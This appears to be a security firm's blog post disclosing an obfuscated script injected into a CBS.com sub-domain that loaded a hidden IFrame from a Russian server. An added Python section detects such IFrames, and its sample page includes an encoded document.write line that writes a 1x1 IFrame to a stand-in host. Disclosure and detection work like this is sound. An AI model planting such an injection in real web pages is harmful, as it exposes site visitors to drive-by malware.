Today Finjan’s MCRC has revealed that the famous radio and television network, CBS, was compromised as a result of malicious activity.
According to Alexa.com, the Cbs.com website has a traffic rank of 964.
The cybercriminals added a malicious obfuscated script to the infected page. When the page loads, the injected script inserts a malicious IFrame into it.
[Image: Obfuscated script injected on cbs.com sub-domain]
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, which could install malware on the unsuspecting client machine. The remote Russian server is already down.
[Image: The obfuscated code as it appears on cbs.com sub-domain in the source]
[Image: The de-obfuscated script]
[Image: The malicious Russian server, from which the IFrame pulled the malicious code]
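For site owners who want to check their own pages for this pattern, the following is an added example, not code from the original post or from Finjan. It statically decodes percent-encoded string literals in inline scripts and reports any IFrame, static or script-written, that points off-site. The obfuscation style (`unescape` plus `document.write`), the host names and all function names are assumptions made for illustration, since the post's screenshots are not available.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page (not the cbs.com source): one percent-encoded
# document.write() injection and one legitimate same-site iframe.
SAMPLE_PAGE = """<html><body><h1>News</h1>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//injected.example.invalid/in.php%22%20width%3D%221%22%20height%3D%221%22%3E%3C/iframe%3E'));</script>
<iframe src="/video/player.html" width="640" height="360"></iframe>
</body></html>"""

# Quoted string literals that contain at least one %XX escape.
ENCODED_LITERAL = re.compile(r"['\"]([^'\"]*%[0-9A-Fa-f]{2}[^'\"]*)['\"]")

class TagCollector(HTMLParser):
    """Collects inline <script> bodies and the attributes of every <iframe>."""
    def __init__(self):
        super().__init__()
        self.scripts, self.iframes, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "iframe":
            self.iframes.append(dict(attrs))
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector

def is_off_site(src, site_host):
    """True when src names a host other than site_host or its sub-domains."""
    host = urlparse(src or "").hostname
    return bool(host) and host != site_host and not host.endswith("." + site_host)

def find_injected_iframes(html, site_host):
    """Return (origin, src) for every off-site iframe, static or script-written."""
    page = parse(html)
    findings = [("static", a["src"]) for a in page.iframes
                if is_off_site(a.get("src"), site_host)]
    for body in page.scripts:
        for literal in ENCODED_LITERAL.findall(body):
            decoded = parse(unquote(literal))
            findings += [("decoded-script", a["src"]) for a in decoded.iframes
                         if is_off_site(a.get("src"), site_host)]
    return findings
```

A static pass like this only catches single-layer percent-encoding; scripts that build the markup at run time need a rendered-DOM comparison instead.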
As always, the MCRC team immediately informed CBS.com of the infection.
This case shows us once again that infecting legitimate websites with malicious obfuscated code remains a favorite and highly effective attack vector for hackers!
We have not seen the last of it yet...
Posted by Moshe Basanchig